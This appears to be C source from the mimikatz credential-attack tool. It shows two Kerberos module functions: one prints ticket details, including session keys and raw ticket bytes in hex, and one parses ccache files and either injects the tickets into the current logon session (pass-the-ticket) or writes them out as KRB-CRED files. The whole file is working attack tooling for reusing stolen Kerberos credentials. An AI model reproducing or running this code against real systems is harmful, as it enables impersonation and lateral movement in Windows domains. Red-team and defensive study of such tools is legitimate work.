void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTicketToo) { kprintf(L"\n\t Start/End/MaxRenew: "); kull_m_string_displayLocalFileTime(&ticket->StartTime); kprintf(L" ; "); kull_m_string_displayLocalFileTime(&ticket->EndTime); kprintf(L" ; "); kull_m_string_displayLocalFileTime(&ticket->RenewUntil); kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Service Name ", ticket->ServiceName, &ticket->DomainName); kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Target Name ", ticket->TargetName, &ticket->TargetDomainName); kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Client Name ", ticket->ClientName, &ticket->AltTargetDomainName); if(ticket->Description.Buffer) kprintf(L" ( %wZ )", &ticket->Description); kprintf(L"\n\t Flags %08x : ", ticket->TicketFlags); kuhl_m_kerberos_ticket_displayFlags(ticket->TicketFlags); kprintf(L"\n\t Session Key : 0x%08x - %s", ticket->KeyType, kuhl_m_kerberos_ticket_etype(ticket->KeyType)); if(ticket->Key.Value) { kprintf(L"\n\t "); kull_m_string_wprintf_hex(ticket->Key.Value, ticket->Key.Length, 0); } kprintf(L"\n\t Ticket : 0x%08x - %s ; kvno = %u", ticket->TicketEncType, kuhl_m_kerberos_ticket_etype(ticket->TicketEncType), ticket->TicketKvno); if(encodedTicketToo) { kprintf(L"\n\t "); if(ticket->Ticket.Value) kull_m_string_wprintf_hex(ticket->Ticket.Value, ticket->Ticket.Length, 1); else PRINT_ERROR_AUTO(L"NULL Ticket Value !"); } else kprintf(L"\t[...]"); }
NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL isInject, BOOL isSave) { PBYTE file, data; DWORD length, i; USHORT version; PKERB_EXTERNAL_NAME principalName; UNICODE_STRING principalRealm; PKIWI_KERBEROS_TICKET ticket; PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred; DWORD App_KrbCred_Size; wchar_t * saveFilename; if(argc) { if(kull_m_file_readData(argv[0], &file, &length)) { data = file; version = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); if(version == 0x0504) { data += sizeof(USHORT) + _byteswap_ushort(*(PUSHORT) data); kuhl_m_kerberos_ccache_externalname(&data, &principalName, &principalRealm); if(principalName) { kuhl_m_kerberos_ticket_displayExternalName(L"\nPrincipal : ", principalName, &principalRealm); for(i = 0; data < (file + length); i++) { kprintf(L"\n\nData %u", i); if(ticket = (PKIWI_KERBEROS_TICKET) LocalAlloc(LPTR, sizeof(KIWI_KERBEROS_TICKET))) { kuhl_m_kerberos_ccache_externalname(&data, &ticket->ClientName, &ticket->AltTargetDomainName); kuhl_m_kerberos_ccache_externalname(&data, &ticket->ServiceName, &ticket->DomainName); ticket->TargetName = kuhl_m_kerberos_ticket_copyExternalName(ticket->ServiceName); kull_m_string_copyUnicodeStringBuffer(&ticket->DomainName, &ticket->TargetDomainName); ticket->KeyType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); ticket->TicketEncType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); ticket->Key.Length = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT); if(ticket->Key.Length) if(ticket->Key.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Key.Length)) RtlCopyMemory(ticket->Key.Value, data, ticket->Key.Length); data += ticket->Key.Length + sizeof(DWORD); // authtime; kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->StartTime); data += sizeof(DWORD); // local ? kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->EndTime); data += sizeof(DWORD); kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->RenewUntil); data += sizeof(DWORD) + sizeof(UCHAR); // skey ticket->TicketFlags = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD); kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // address kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // authdata ticket->Ticket.Length = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD); ticket->TicketKvno = 2; if(ticket->Ticket.Length) if(ticket->Ticket.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Ticket.Length)) RtlCopyMemory(ticket->Ticket.Value, data, ticket->Ticket.Length); data += ticket->Ticket.Length; kuhl_m_kerberos_ccache_skip_buffer(&data); if(!RtlEqualUnicodeString(&usXCACHECONF, &ticket->TargetDomainName, TRUE)) { kuhl_m_kerberos_ticket_display(ticket, FALSE); if(isSave || isInject) { if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(ticket, TRUE)) { App_KrbCred_Size = kull_m_asn1_getSize(App_KrbCred); if(isInject) { kprintf(L"\n\t * Injecting ticket : "); if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(App_KrbCred, App_KrbCred_Size))) kprintf(L"OK\n"); } else { if(saveFilename = kuhl_m_kerberos_ccache_generateFileName(i, ticket, MIMIKATZ_KERBEROS_EXT)) { if(kull_m_file_writeData(saveFilename, App_KrbCred, App_KrbCred_Size)) kprintf(L"\n\t * Saved to file %s !", saveFilename); else PRINT_ERROR_AUTO(L"kull_m_file_writeData"); LocalFree(saveFilename); } } LocalFree(App_KrbCred); } } } else kprintf(L"\n\t* %wZ entry? *", &usXCACHECONF); kuhl_m_kerberos_ticket_freeTicket(ticket); } } kuhl_m_kerberos_ticket_freeExternalName(principalName); } } else PRINT_ERROR(L"ccache version != 0x0504\n"); LocalFree(file); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"At least one filename is needed\n"); return STATUS_SUCCESS; }